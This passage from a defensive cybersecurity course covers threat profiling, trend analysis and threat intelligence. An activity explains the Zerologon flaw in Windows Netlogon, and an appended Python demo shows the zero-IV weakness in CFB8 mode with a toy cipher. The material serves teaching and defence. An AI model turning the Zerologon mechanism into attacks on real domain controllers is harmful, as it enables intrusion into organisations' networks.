Blackmail/extortion: As with defamation, blackmail can be a form of revenge, but it isn't necessarily. Threatening to release embarrassing or compromising information about an individual or organization can give the attacker a considerable amount of power over their victims. They might be doing this for payment, for a job-based reward (like a promotion), or simply because they find it fun.
Blackmailers typically breach email accounts or other communication media to expose correspondence that might put the victim in a bad light. Likewise, the attacker can also threaten to release financial records that indicate impropriety within the organization (such as tax evasion).
Extortion is related to blackmail, but instead of threatening to release incriminating information, an extortionist attempts to coerce their victim into doing something favorable for the attacker under the threat of violence, destruction of property, or some other malicious act. A common example in the world of cybersecurity is ransomware that threatens to destroy critical data unless the victim pays the attacker.

Hacktivism/political: A hacktivist's goal is more often than not to raise awareness of the cause they are fighting for, and similarly, to take part in a kind of vigilante justice. Because of the Internet's open and unrestricted origins, many hacktivists target individuals or organizations who they perceive as a detriment to government transparency, freedom of expression, an open source philosophy, and other ideals of a democratic society. However, threat actors from different cultures with vastly different beliefs may, by contrast, attack organizations that do uphold these ideals.
Either way, hacktivists most commonly seek to initiate denial of service (DoS) attacks and humiliation of their victims. Hacktivists are also known to engage in doxing, which is the practice of publishing PII about individuals online.

Cyberterrorism: The line between hacktivism and cyberterrorism is sometimes blurred, but cyberterrorism is generally the intent of those using violence and destruction as a mechanism for achieving their political goals, whereas hacktivism is less likely to incorporate this level of harm.
When successful, cyberterrorism therefore has more devastating effects on a society and its people. Whereas terrorism typically involves the direct loss of life, cyberterrorism can be responsible for the loss of life in an indirect manner; for example, the disruption of a hospital's communication systems may make it more difficult for medical personnel to properly treat their patients.


Threat Targets
To achieve their goals, threat actors need to attack specific resources. These resources are often technical in nature, but can also include human resources. Identifying these resources, how they might be threatened, and who might threaten them, is an important step in the profiling process. You'll become better prepared to defend these targets and mitigate attacks against them.
The following table lists some of the most common targets of threats.

Threat Target: Description

Individuals: Threat actors can target individuals for a variety of reasons, depending on various factors associated with that individual victim. For example, attackers will often direct phishing attempts at particularly wealthy individuals to obtain a huge payout—a process called whaling. Even non-wealthy individuals may be the target of identity theft, in which a threat actor exploits a victim's credit and other financial information for their own gain.
Monetary gain is not the only reason why an individual may become a target. A threat actor may take revenge against a specific person for a perceived wrong. Likewise, some threat actors may target individuals based on their sociopolitical affiliation.

Corporations: Corporations maintain a great deal of assets, and the nature of big business makes corporations the primary target for threat actors interested in monetary gain. Nevertheless, a threat actor may wish to instead tarnish the corporation's brand as part of a hacktivist campaign or sabotage by a competitor. Competitors may also take a more subtle approach and engage in espionage against other corporations to glean certain trade secrets.

Non-profit associations: Unlike corporations, non-profit associations are not commonly targeted by threat actors looking for money. However, non-profits still need to manage money to keep operations afloat, so a threat actor may still see an opportunity there. It's more likely a threat actor will target a non-profit because of sociopolitical reasons, especially since non-profits typically push for some sort of social cause a threat actor may take exception to.
In order to keep operational costs as low as possible, non-profits may be much more lax about security than a profit-motivated corporation is. This could provide threat actors with a more attractive target, even if the effect of their attack is smaller in magnitude.

Governments: Governments, especially those in first-world nations, are usually the most daunting targets. They tend to have the most rigorous security standards and are armed with cutting-edge tools, making an intrusion or other attack a difficult proposition. This can make them a more common target for recreational attackers looking to enhance their reputation.
Governments are also targeted by other governments and state-sponsored hackers as part of cyberwarfare. They can attempt to steal national secrets, damage computer infrastructure, and impede national operations.

Critical infrastructure: Critical infrastructure refers to resources that, if damaged or destroyed, would cause significant negative impact to the economy, public health and safety, or security of a society. Examples include water supplies, transportation services, and health services.
Critical infrastructure is potentially threatened the most by terrorists looking to cause panic and disrupt major sources of power for a society. It can also become a target for state-sponsored hackers as a component of cyberwarfare.

Systems: Just about every system an organization puts in place can become a target. While you might typically think of workstations and servers as the main targets of an attack, threat actors may also look to exploit less traditional computing systems. Some of these systems include:
• Mobile devices, which are very common in the workforce and are less likely to be properly secured and managed.
• Internet of Things (IoT) devices, which are often insecure by design and can enable a threat actor to exploit an individual's privacy or an organization's data.
• Programmable logic controllers (PLCs), which are the components that directly control industrial control systems (ICSs), often as part of a supervisory control and data acquisition (SCADA) system.

Attack Vectors
An attack vector is the method that an attack takes. In other words, the attack itself is executed along a certain path—that path is the vector. Different vectors may enable different outcomes in the attack. Likewise, different motivations and goals may prompt an attacker to take different vectors. One vector may be more desirable to an attacker because it is less secure, whereas others may be more well-defended by the organization, and thus less attractive to attackers. Understanding the vectors that attackers take is a crucial step in cybersecurity because it helps the practitioner identify the how of an attack. When you analyze how attacks are possible within the context of your organization as well as with external forces, you can more easily stop or prevent incidents entirely.
Although the paths that attackers take are diverse, there are three general elements that can contribute to an attack vector:

• Vulnerabilities: Attackers will almost always search for holes within your systems and networks. Any gaps in security they find are potential vectors of an attack, simply because the attack is likely to be easier and more successful than if they take a path of greater resistance. Why break down a wall to get access to a room when the back door is open?
• Exploits: These almost always depend on vulnerabilities to be effective. When the gap in security is identified, the attacker can launch a tool or utility to take advantage of that gap. Exploits themselves are often programs that carry payloads—the payloads carry the main portion of the exploit. These payloads can be customized by the attacker to suit their preferences, as well as to be more effective in a certain context or environment.
• Techniques: An attack's technique provides more detail about the path it takes, as well as how it operates. It can also help categorize the effects of an exploit payload. There may be several different ways to launch a successful attack on a system or network, but an attacker can choose one over another for various reasons. The most common reason is efficiency, but escaping notice is also an important factor.


Attack Technique Criteria

As mentioned before, attackers can choose different techniques based on factors such as ease, effectiveness, and concealment. These factors will influence which paths the attacker takes and how they go about using an exploit. The following are general criteria that cover most attack techniques:
• Targeted vs. non-targeted: Attackers won't necessarily choose specific targets, but may instead cast a wide net to catch as many potential victims and vulnerabilities as possible. In some circumstances, this can make an attack more effective, as there are plenty of fallbacks in case one target doesn't give way to the attack. However, attackers may still prefer the more focused technique of attacking a single target. They can dedicate all of their time and effort to one scenario, making it as effective as possible. It's also easier to cover one's tracks when there isn't much to cover in the first place.
• Direct vs. indirect: To attack targets directly, an attacker usually exploits some technical flaw in a system or network. They are then able to cause damage or exfiltrate information, whatever their goal may be, by engaging with the target. Depending on the skill of the attacker and the state of the target's defenses, this can be relatively quick, easy, and produce instant results. However, this is not always feasible. Attackers who take an indirect approach do so by being patient and manipulative. For example, a direct attack on a customer's PII could involve breaching the network and copying the database the information resides on. In an indirect attack, the attacker could impersonate a customer and socially engineer a customer service representative into releasing this PII.
• Stealth vs. non-stealth: A huge concern of most attackers is being detected—not just during the attack itself, but after, when traces of the attack may still remain for a forensics team to identify. Stealth techniques, like introducing Trojan horse malware that acts as a man-in-the-middle during network communications, can go undetected for a long time, as they do not necessarily show overt signs of compromise. As useful as this sounds to an attacker, some avoid the stealthy route and actually intend to make as much noise as possible. Non-stealth attacks are often detected easily, but can cause panic and confusion, especially among unseasoned personnel. They can also be used as a form of misdirection—if the security team is tied up responding to an overt attack, the attacker may find it easier to gain access using other means.
• Client-side vs. server-side: This technique criterion is most often enacted when the target is a website, web app, or some other web-based service. Server-side attacks attempt to compromise the computer systems that serve data to clients so they end up serving harmful data or no data at all. Successfully compromising a server can have a wide range of effects, as any client that attempts to connect to that server may be exposed to malicious activity. However, businesses that run servers, especially large corporations, are much more likely to harden these servers against attacks, so an attacker may be dissuaded from taking this path. On the other end, average users don't exercise that same high level of security, so their role as a client becomes an attractive target for attackers. An attack may have much less reach if only one client's browser is compromised, but this could be all the attacker needs to cause a good deal of harm.

Note: These four criteria are not mutually exclusive, and attackers often blend them together when choosing their techniques.

Threat Profiles

All of the threat components you've seen thus far—actor types, motives, intentions, targets, vectors, and techniques—can be combined into a single threat profile. Compiling all of these characteristics into a single profile will greatly assist your prevention, mitigation, and response techniques should the threat actualize. This is because your defense strategies will need to be adjusted based on the threat's nature—and because there are many dimensions to a threat, being able to describe them accurately in words will ensure that no crucial information is missing or in the wrong context.

Figure 2-1: A basic example of a threat profile.

Guidelines for Classifying Threats

Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the CHOICE Course screen.

Follow these guidelines when classifying threats to the organization.

Classify Threats

When classifying threats:
• Recognize the type of threat actors that are out there, as well as their skill level and mental process.
• Analyze the different motives of attackers and how these motives can affect an attack.
• Identify threat intentions to discover exactly what an attacker is after.
• Identify how certain entities and assets may become the target(s) of a threat.
• Understand how vulnerabilities, exploits, and techniques are part of the path that attackers take to compromise systems and networks.
• Categorize threat techniques into different criteria to study their effect.
• Combine the characteristics of a threat into a complete threat profile.

ACTIVITY 2-1
Constructing a Threat Profile

Scenario

You're a cybersecurity analyst for Develetech. As part of your job, you evaluate the company's assets to identify gaps in security that could lead to those assets being compromised. You've been called on to detail the potential threats to each of the company's major assets. This typically involves constructing a thorough threat profile so that your colleagues in IT can make more well-informed decisions in regard to implementing security controls and strategies. At the moment, you've been asked to create this threat profile based on Develetech's customer records database.

Instructor note: Consider leading this activity as a group discussion. Students can work together to brainstorm ideas and come to a consensus on each component of the threat profile. Fill in the slide based on students' responses. Consider having students construct two different profiles based on the scenario questions. At the end of the activity, ask them which profile they believe is most accurate. The activity questions present the threat components in reverse order to get students thinking more deeply about how the components are connected. This can help students recognize patterns and achieve a more robust and useful threat profile. Keep in mind that there is not necessarily an objectively right answer to any of these questions, and that the answers provided are only examples.

1. Develetech's customer records database contains a variety of information about its customers, including first and last name, phone number, physical address, place of employment, date of birth, and purchase history. Recall that Develetech is a large electronics manufacturer, and it sells products like smart TVs, smartwatches, virtual reality head-mounted displays (VR HMDs), 3D printers, and other technology on the rise. What attack technique criteria do you envision threat actors are most likely to use in order to compromise this database?
A: Answers will vary. Depending on the strength of any in-place security controls, an attacker may be inclined to launch a direct attack on the database. This is more likely to net the attacker access to everything in the database; however, if they are only searching for specific information, they may choose more indirect means. Because the database is likely to already be hardened against attack, attackers would probably opt for stealthy methods. This would ensure the attack remains undetected before damage is done, and it may help the attacker cover their tracks afterward. However, attackers interested more in causing damage and denial of service may forgo stealth to maximize their impact.

2. How could security vulnerabilities and exploitation tools shape the vector a threat actor may use to attack the database?
A: Answers will vary. There are several potential vulnerabilities that could open the way for an attacker. The database itself may be employing weak authentication mechanisms, such as an easily guessed administrator password. The database may also use poor or obsolete encryption, making it easy for the attacker to read the data once they've accessed it. Outside the database, unpatched network authorization mechanisms could give the attacker remote access to the database. As far as exploitation tactics, there are many tools available that can capture network authentication packets as well as cause a database to dump its contents. Certain payloads can also be injected into a database to passively monitor new entries or changes.

3. What do you believe are the most likely intentions an attacker has when it comes to compromising the customer records database?
A: Answers will vary. Theft is probably the most common intention in this case. An attacker who is able to steal these records can sell them on the black market or to one of Develetech's corporate competitors. PII can be very useful to individuals and organizations looking to gain an advantage over the company or its customers. Similarly, an attacker may be directly spying on Develetech on behalf of one of its competitors to see where its new products are strongest and gain an edge in the marketplace. More personal or idealistic intentions, such as revenge and activism, are less likely; however, depending on the company's actions and its relationship with the public, an attacker may seek to humiliate the company by exposing such a crucial asset to the world.

4. What do you believe are the most likely motives an attacker has for compromising the customer records database?
A: Answers will vary. Assuming theft is the most likely intent, desire for money is the most likely motive. An attacker can make a great deal of money selling PII. However, there are many other possible motives: The attacker could have seen all of the recent data breaches in the news and chosen to make a name for themselves by emulating these breaches; the attacker may destroy the database rather than copy it, demonstrating they have the power to do so; or the attacker may simply breach the database because they wanted to see if they could, and not necessarily to exfiltrate any data.

5. Using what you've determined for the previous questions, what type of threat actor do you think is most likely to carry out a compromise of the customer records database?
A: Answers will vary. It's unlikely that a script kiddie would even be able to breach such a high-profile target. Likewise, there may not be much of a reason why a state-sponsored hacker would go after an electronics manufacturer. More likely, the threat actor is either an insider or cybercriminal. For the former, the threat actor already has significant access to their target, as well as extensive knowledge an external user would not possess. This gives them a key advantage and can make their theft or destruction of the database much easier to achieve. A cybercriminal will likely have the requisite skill to break into the database from the outside, as they have probably made a career out of stealing personal information.

6. Based on your previous decisions, how would you describe the profile of the most likely threat(s) to Develetech's customer records database?
A: Answers will vary depending on the answers to the previous questions, and you may believe that multiple profiles are necessary. One example is as follows: The threat actor is likely an insider—someone with knowledge of the database's structure, physical or logical location, and even its credentials. The insider's motive is most likely a desire for money, as they know this database is very valuable to identity thieves and corporate competitors. Rather than destroy the database or deny service to it, the threat's intention is probably to copy the relevant data and exfiltrate it. The insider may take advantage of the database's poor authentication methods to access it, and may use a code injection exploit to dump the database. The insider is likely somewhat technically proficient if they've gotten to this point, so they will probably try a stealthy approach and remove any traces that they have accessed the database.

TOPIC B
Analyze Trends Affecting Security Posture

Threats don't exist in a vacuum, and neither does cybersecurity as a practice. They evolve and follow certain trends over time, just like technology and society in general. To stop these changes from passing you by, you need to constantly stay up to date on the threat landscape and other factors that dynamically affect security.

Ongoing Trend Analysis

To stay up to date on the current threat and vulnerability climate, it's absolutely vital you conduct ongoing analysis of all areas with the potential to put your business at risk. The more informed you are, the better equipped you will be to meet your organization's diverse business and operational needs.

An analysis of cybersecurity trends can reveal new flaws or other factors that will have an impact on your organization's security posture. You can obtain trend data by conducting research into a variety of resources, including vulnerability databases, security blogs, bug tracking websites, and so on. But before you consult these resources, you should be aware of the best practices that guide good research:

• Seek out industry-accepted and vetted sources for information, including major regulatory and standards agencies like the National Institute of Standards and Technology (NIST) and ISACA.
• Exercise discretion with unverified sources or untested advice, and beware of social engineering hoaxes.
• Don't settle for one source—corroborate information across several distinct sources.
• Conduct research across a spectrum of resources—i.e., don't limit yourself to just reading blogs.

Lesson 2: Analyzing the Threat Landscape | Topic B


Figure 2-2: An example of a reputable security resource on the Internet.

After gathering trend data, you can apply that data to your systems wherever it is relevant. You'll want to analyze key organizational resources like operating system logs, output from hardware and software tools, and data, to determine what is affected by these trends and how. For example, a new flaw in the Linux kernel will prompt you to identify your most sensitive systems running Linux, and then develop a plan of action for patching those systems (if such a patch is available) with minimal disruption.

Commonly Targeted Assets

While you can count on just about every piece of information being a potential target, certain information assets are much more commonly attacked than others. These targets are especially attractive to attackers in our modern, interconnected world. The reasons are generally twofold: one, these targets can lead to great payouts for the attacker, and consequently, significant damage to the victim(s); and two, because these targets have become so ubiquitous and essential to everyday life in the developed world, securing them is a major challenge.

The following are some of the most popular targets in the current threat landscape:
• Computing and power resources: Computing assets are always a popular target because of how crucial they are to any organization's infrastructure. They are the foundation on which all of the following assets are built and operated. If an attacker can compromise the foundation, then they'll have an easy time compromising everything else. Similarly, computers depend on power to function, and if an attacker can compromise power resources like electric generators, they can cause major disruption and service outages for many organizations and citizens.
• Financial information: It's not hard to guess why an attacker would go after an individual's or organization's financial information, but many people overlook how much easier it has become for attackers to actually succeed in stealing money from victims. Everyone has a bank account, and most people do their banking online—not to mention all of the credit card purchases they make from online vendors. This makes it almost inevitable that enough people and companies will mishandle their financial information for attackers to capitalize on.
• Account information: People sign up for so many disparate services online they end up with more accounts than they can even remember. This causes people to be careless with their credentials, especially their passwords; why come up with a strong password for an account you're just going to forget in a week? Attackers pounce on weak account information to begin assuming a user's identity, even if that account is limited in what it can do. People often use the same credentials or profile information across multiple accounts, which only adds to the attack surface of a person's digital identity.
• PII and PHI: Users place trust in companies, especially those running web services, to keep their personally identifiable information (PII) and protected health information (PHI) safe from prying eyes. There's been no shortage of recent PII and PHI breaches in the news, however. Attackers seek out PII and PHI to sell a person's contact information to the highest bidder, but they also leak certain details about a person's identity or health to harass, frustrate, and embarrass their victims.
• Intellectual property: Easy access to powerful software and hardware tools can help users circumvent digital rights management (DRM) mechanisms. Companies or individuals that deal in copyrighted materials like video, audio, and interactive assets are particularly at risk. Likewise, trade secrets are commonly targeted as part of corporate espionage and sabotage efforts, as well as extortion attempts. Despite their efforts to stem online piracy, content developers and publishers frequently see their assets distributed on file sharing services.
• National security data: The rise of cyberwarfare, cyberterrorism, and hacktivism has, on several occasions, led to the compromise of national security data. For example, in 2020, multiple government agencies and government contractors across the world suffered data breaches that exposed sensitive documents, source code, security tools, cryptographic secrets, and much more. U.S. officials identified the Russian government as the most likely suspect, implying that this attack was state sponsored.

The Latest Vulnerabilities

Some of the latest vulnerabilities as of mid-2021 include:
• As always, social engineering will continue to be one of the most effective forms of attack. There are two vulnerabilities that still contribute to this: poorly educated and trained Internet users, and companies that refuse to implement robust security measures like backing up critical data offsite or offline to defend against ransomware.
• In the midst of the COVID-19 pandemic, the world saw a huge increase in remote work. As a result, home computer setups became a major area of vulnerability as employees regularly interface with the company network from home networks that are not nearly as secure. In addition, flaws in VPN software will have a significant impact.
• APIs are becoming more and more common for users to access, but their security has often lagged behind. Unsecured APIs enable an attacker to gain a foothold into more than just one target, and third-party targets as well. Traditional defense mechanisms are inadequate against automated attacks against APIs.
• High-profile vulnerabilities in Microsoft products, like Microsoft Exchange, Windows, and Microsoft 365, are also becoming a popular target for exploitation. Although fixes for these vulnerabilities are usually issued quickly, unpatched systems will still be a major vector.
• As more and more organizations offload their operations onto the cloud, the degree to which these organizations ignore the unique security challenges of the cloud will also increase. Poorly secured cloud infrastructure will be an attractive target to attackers looking to steal data or cause disruption to services. Attackers may even be able to deploy malicious virtual infrastructure within a cloud environment, causing harm that appears to come from a legitimate source.

The Latest Threats and Exploits

Some of the latest threats and exploits include the following:
• Ransomware has proven very effective recently, and cybercriminals will likely continue to target business entities they think will pay them large sums of money. In particular, cybercriminals may target individual organizations and hold assets for ransom that are critical to the organization's entire production processes—that way, the attacker is more likely to force the organization to pay up.
• Ransomware as a Service, or RaaS, is rising in online criminal communities. Cybercriminals are creating automated ransomware kits and selling them to script kiddies who are interested in quick and effective means of extorting money from a victim. The high demand for these kits has made it more worthwhile for their authors to incorporate advanced features, especially anti-malware evasion techniques. The selling of malicious services is not a new phenomenon; for years, attackers have rented out botnets for use in denial of service attacks. However, this malicious business model has only recently extended into the domain of ransomware.
• State-sponsored attack programs are on the rise. The scope and impact of these attack programs is likely to increase significantly in the near future. This means critical infrastructure will likely become a bigger target for attackers looking to do more damage.
• Some attackers are taking advantage of the public health crisis by specifically targeting the healthcare sector to glean PHI. For example, the rise of remote doctor's visits has, like remote work, greatly expanded the attack surface. Even beyond PHI, attackers are attempting to steal highly sensitive data concerning COVID-19 treatments and vaccines to either sell the information, tamper with it, or destroy it.
• Many computer technologies, in the cybersecurity field and elsewhere, are becoming more empowered by artificial intelligence (AI). If effective, cybercriminals can use AI to create exploits that adapt to their target environments and operate more efficiently and silently. In some cases, AI may be able to generate novel attacks, not just boost existing ones.

The Latest Security Technologies

Outdated technology is replaced by newer, more effective technology all the time. Security tools and prevention techniques are no different. Some security technologies that are relatively new and/or emerging in the business world are:
• Machine learning and deep learning will not just help attackers, but security personnel as well. AI-powered threat management tools are particularly of interest, as they can identify threats and respond to them much more quickly and with a greater degree of accuracy than a human operator. If properly tuned, these AI systems may be able to prevent intrusions that otherwise would have wreaked havoc or even gone unnoticed.
• Endpoint detection and response (EDR) solutions are similar to host-based intrusion prevention systems (HIPSs) in that they spot undesired activity on a host machine and take action to stop that activity. The difference is that EDR systems tend to offer more advanced detection and response techniques; for example, they can leverage online threat databases in real time, use machine learning to detect complex or previously unknown threats, and so on.
• Cloud access security brokers (CASBs) act as a defensive screen between clients accessing cloud services and the cloud services themselves. CASBs monitor cloud-based activity for potentially malicious behaviors while also enforcing the organization's security policy.
• Blockchain tools leverage cryptography to create a chain of trust that maintains the integrity of records in the chain (called a ledger). Aside from cryptocurrency, the blockchain sees use primarily to support secure ledgers in the banking industry, but it is also applicable to any scenario that requires a decentralized chain of trust.
• User behavior analytics (UBA) evaluates the activities of users in order to identify any such activity that matches known patterns of malicious or otherwise undesired behavior. Although traditional security systems can detect some patterns of known behavior, UBA goes one step further by identifying factors or characteristics of undesired behavior that are not immediately apparent to a human security professional. As such, UBA systems typically incorporate AI decision making.

Trend Data Analytics

Data analytics is the process of applying analytical techniques (e.g., statistics) to data to reveal patterns that can inform decision making. While looking at individual events can provide focused information, looking at all the data as a whole through the lens of analytics can expose important trends. These trends can help you gain information not only on the threats the organization is currently facing, but also what threats may be coming in the future and what countermeasures are emerging to deal with them. You should be able to analyze and interpret trend data to anticipate the cyber-defense needs of your organization, and stay one step ahead of the attackers.

Figure 2-3: The number of vulnerabilities by six major vendors over a five-year period as tracked by the CVE. Source: https://www.cvedetails.com/top-50-vendors.php.

Proper data analytics relies on having a great deal of useful data to draw from. This data can come from a variety of sources, including internal monitoring platforms that record network traffic, as well as external sources like the CVE and other security databases, and many more. The data from these sources is put through a process called extract, transform, and load (ETL), in which the data is collected, combined, cleaned, prepared, and processed to make it more conducive to a deeper analysis. Various statistical methods and visualizations are applied to the data to reveal useful patterns. The data may even be used to generate machine learning models that can do a better job of predicting trends.

Note: Data analytics is an entire field of study of its own, and a deeper dive is beyond the scope of this course.

"Soft" Trend Analysis

Not all analysis needs to incorporate hard data. The information you absorb from your surroundings is just as important. Attending conferences, listening to podcasts, reading blog posts, and staying engaged on social media all contribute to a larger awareness of the emerging threat and defense climates. Identifying trends requires more than just passive absorption of information, however. You need to exercise careful judgment to separate the signal from the noise, and to avoid being tripped up by misleading information, distractions, and other pitfalls of poor critical thinking. Remember, security should not be reactive, but proactive; this could mean the difference between scrambling to mitigate a security incident and not suffering the incident at all.

Trend Reports and Documentation

After analyzing trend data, you should prepare to present your findings to an audience. Like any other report, the form it takes and the amount of technical information it includes will both depend on who your audience is. Still, the following are some common topics to include in a report about security posture trends:

• Ongoing trends you've identified in the world of cybersecurity, including threats, vulnerabilities, and technologies.
• Trends that are not yet ongoing, but which industry experts predict will soon come to fruition.
• Examples of why these issues are actually trends and not just isolated one-off incidents.
• Which of the identified trends are most relevant to your current security posture, and which are less relevant (or not relevant at all).
• What assets are affected by these trends, and how.
• Evidence that these trends have already been affecting your assets or soon will.
• What controls the organization currently has in place to deal with these issues, and whether or not they are adequate.
• Suggestions for updating controls or obtaining new ones to deal with the latest trends.
• Necessary "big picture" changes to your security posture, e.g., fostering a better cybersecurity culture in the organization or rewriting policies to account for major landscape changes.

Threat Intelligence Lifecycle

The threat intelligence lifecycle is the comprehensive process of addressing emerging threats and threat sources. One of the most prominent ways to conceptualize this lifecycle is by dividing it into five different phases or actions, collectively called TCPED:

• Tasking, in which a decision maker or other stakeholder requests information.
• Collection, in which relevant data is identified and gathered within a reasonable time frame.
• Processing, in which the data is prepared to make it easier to use for exploitation (whether by a human, hardware, or software).
• Exploitation, in which the significance and the implications of the processed data are identified and interpreted.
• Dissemination, in which actionable exploitation findings are distributed to the tasking authority in a timely manner.

Instructor note: Ensure students understand that the term "exploitation" in this context does not refer to an attacker taking advantage of a vulnerability, but a researcher extracting value from intelligence data.

Figure 2-4: TCPED as a lifecycle supporting threat intelligence.

TCPED Architecture

Organizations interested in threat intelligence can create a security architecture that implements TCPED. Although the five phases remain the same, each organization's architecture will be different based on its own business needs and unique environment. Much of what has already been discussed in this topic can affect the form and function of that architecture. For example, the sources you collect data from will obviously affect the collection phase of TCPED, but they may also have an impact on how the data is processed if each source formats data differently.

Likewise, how you disseminate threat intelligence will change based on the tasking authority. You'll need to identify the relevant policies and procedures to know who is authorized to receive the threat intelligence report, and how. For example, service-level agreements (SLAs) for threat intelligence providers will likely list the personnel the information should be disseminated to, and what the required channels are for that dissemination.

There are several other factors that affect the TCPED architecture, including, but not limited to: asset inventory, threat modeling, network scanning, forensic investigation, and e-discovery.

Guidelines for Analyzing Trends Affecting Security Posture

Follow these guidelines when analyzing trends affecting security posture.

Analyze Trends
When analyzing trends:
• Seek out industry-accepted and reputable sources of security information.
• Corroborate information across multiple sources.
• Consult blogs, books, organizations, vulnerability databases, advisory websites, mailing lists, and social networking sites for security information.
• Exercise discretion and critical thinking as part of your overall situational awareness.
• Recognize the most commonly targeted assets in the current threat landscape.
• Identify some of the most recent vulnerabilities, especially ones with relevance in your organization.
• Identify the key threats and exploits that may cause trouble for your organization in the near future.
• Familiarize yourself with recent security technologies such as blockchain tools and machine learning tools.
• Stay informed about the trends in your industry and the cybersecurity industry in general.
• Use data analytics to glean insights from trend data.
• Ensure your trend reports are comprehensive and provide suitable evidence of your claims.
• Consider how multiple factors can affect your threat intelligence architecture.

ACTIVITY 2-2
Analyzing Trends Affecting Security Posture

Before You Begin
You'll be using your Windows® 10 client for this activity.

Scenario
As a security practitioner at Develetech, you want to make sure your knowledge of the threat landscape doesn't lag behind. As part of a new initiative, you'll do research in various areas to gain a better awareness of your company's security situation. You'll start by finding security-minded blogs to regularly reference. Then, you'll look up recent vulnerabilities you suspect might affect your systems.
Because Develetech is growing and expanding some of its infrastructure, you'll also want to keep pace with evolving technology and its implications so that you'll be prepared for the future. All of this research will keep you and your organization from falling behind in an industry that is always moving forward.

Instructor note: Use this activity as a vehicle for discussion. What have students learned from perusing these resources? How can this knowledge affect the security in their organizations? Be mindful of your timing during this activity. Make sure to monitor student progress and keep them on the relevant track. If the websites have been updated, the navigation steps may vary. Check for changes before class.

1. Find information security blogs.
a) Open a web browser.
b) Navigate to the web search site of your choice and search for security blogs.
c) Select any of the results and skim some of the blog's most recent articles. Identify the author(s) and evaluate how security subjects are presented. Are the articles objective and free of bias? Do they rely on subjective accounts and experiences? Are they sensationalized? What else can you determine about the author(s)' experience and perspective?
d) Repeat this process for some of the other blogs returned in your search.
e) Share with the class what you've determined about each blog, and which ones, if any, seem like reputable and useful sources of information.

2. Consult a vulnerability database about the Zerologon vulnerability.
a) Navigate to https://cve.mitre.org.
b) From the navigation options at the top of the CVE home page, select the Search CVE List link.
c) In the Keyword search text box, type netlogon
d) Select Submit.
e) Read the summary for the item in the list named CVE-2020-1472. A vulnerability exists in the design of Windows' Netlogon Remote Protocol (MS-NRPC) that can enable a privilege elevation when an attacker connects to an Active Directory domain controller.
f) Select the CVE-2020-1472 link to get a more detailed look at the issue. Select any of the links in the References section to learn more about the technical aspect of the vulnerability—referred to as Zerologon—and how it affects Active Directory domain environments.
Zerologon is one of the most commonly exploited vulnerabilities today and has been used to attack multiple different industries around the world. The attacker merely needs to establish a connection with the domain controller to be able to perform the attack. When establishing a connection, the attacker issues an 8-byte plaintext challenge to the Netlogon service, which then encrypts that challenge with a session key and produces 8 bytes of ciphertext as a result. The initialization vector (IV) used to perform the encryption is flawed in that it is a fixed value of 16 bytes of zeros. There is a 1 in 256 chance that an input of 8 bytes of zeros will lead to an encrypted output of 8 bytes of zeros. When this happens, the server believes the client has proven knowledge of the session key, so it authenticates that client. The attacker keeps issuing challenges until this happens. Because Netlogon authentication does not restrict the number of attempts like a normal user account, the attacker can simply achieve success through brute force. Once authenticated to the domain controller, the attacker can exploit it in a number of significant ways.
g) Search the CVE for any other specific or general vulnerability that interests you. Share your findings with the class.
3. Research issues related to evolving technology.
a) Navigate to https://www.gartner.com/smarterwithgartner/gartner-top-strategic-technology-trends-for-2021/.
Note: Alternatively, you can go to https://www.gartner.com and search for top strategic technology trends.
b) Identify the most significant emerging technologies of the year.
c) Discuss your findings with the class. Will any of these emerging technologies have an effect on your organization's security? If so, how?

4. Close your browser.

Instructor note: If you're teaching this in 2022 or later, consider looking for an updated report by Gartner or any other technology firm to stay current.
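The "1 in 256" figure in step 2 follows from how 8-bit cipher feedback (CFB8) mode chains each ciphertext byte into the next block encryption. The following added example (not part of the course material) reproduces that chaining over a constructed toy block cipher built from SHA-256 so it runs offline, and contrasts the fixed all-zero IV with a non-zero one; the key and IV values are constructed for illustration.

```python
"""Why a fixed all-zero IV breaks 8-bit cipher feedback (CFB8) mode.

Added example for this course section, not CertNexus code. The block
cipher below is a constructed toy keyed mapping built from SHA-256 so the
script runs offline with the standard library only; the CFB8 chaining is
the same as for a 128-bit block cipher, and that chaining is where the
"1 in 256" figure for the Netlogon flaw comes from. Key and IV values are
constructed for illustration.
"""
import hashlib

BLOCK = 16          # block size in bytes, as for a 128-bit block cipher
CHALLENGE = 8       # length of the 8-byte challenge described in the activity


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Constructed stand-in for a block cipher: a keyed pseudo-random
    mapping from one 16-byte block to another (deliberately not AES)."""
    assert len(block) == BLOCK
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: encrypt the 16-byte shift register, XOR its first byte with one
    plaintext byte, then shift the resulting ciphertext byte into the end of
    the register. Each output byte depends only on the key and the register."""
    assert len(iv) == BLOCK
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = toy_block_encrypt(key, bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        del register[0]
        register.append(c)
    return bytes(out)


def first_keystream_byte_is_zero(key: bytes) -> bool:
    """The single byte the whole zero-IV outcome hinges on: E_k(0...0)[0]."""
    return toy_block_encrypt(key, bytes(BLOCK))[0] == 0


def zero_challenge_collapses(key: bytes, iv: bytes = bytes(BLOCK)) -> bool:
    """True when an all-zero 8-byte challenge encrypts to all-zero ciphertext.

    With IV = 0 and plaintext byte 0, ciphertext byte 0 is E_k(0)[0]. If that
    byte is 0, the register shifted forward is still all zeros, so every later
    byte repeats the same computation and is also 0. The event therefore
    depends on one byte: roughly 1 key in 256. With a non-zero IV the register
    contents change on every step, so each byte is a separate 1-in-256 event
    and the full 8-byte collapse is negligible.
    """
    return cfb8_encrypt(key, iv, bytes(CHALLENGE)) == bytes(CHALLENGE)


def count_collapsing_keys(n_keys: int, iv: bytes) -> int:
    """Count keys 0..n_keys-1 (as 16-byte big-endian values, constructed) for
    which the zero challenge collapses to zero ciphertext under the given IV."""
    return sum(
        zero_challenge_collapses(i.to_bytes(BLOCK, "big"), iv)
        for i in range(n_keys)
    )


if __name__ == "__main__":
    n = 4096
    nonzero_iv = bytes(range(1, BLOCK + 1))   # constructed non-zero IV
    print("all-zero IV :", count_collapsing_keys(n, bytes(BLOCK)), "of", n,
          "keys give an all-zero ciphertext (expected about", n // 256, ")")
    print("non-zero IV :", count_collapsing_keys(n, nonzero_iv), "of", n,
          "keys give an all-zero ciphertext")
```

The count under the all-zero IV lands near n/256 whatever block cipher is plugged in, which is why the defence is a fresh, unpredictable IV per session rather than any change to the cipher itself.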

is
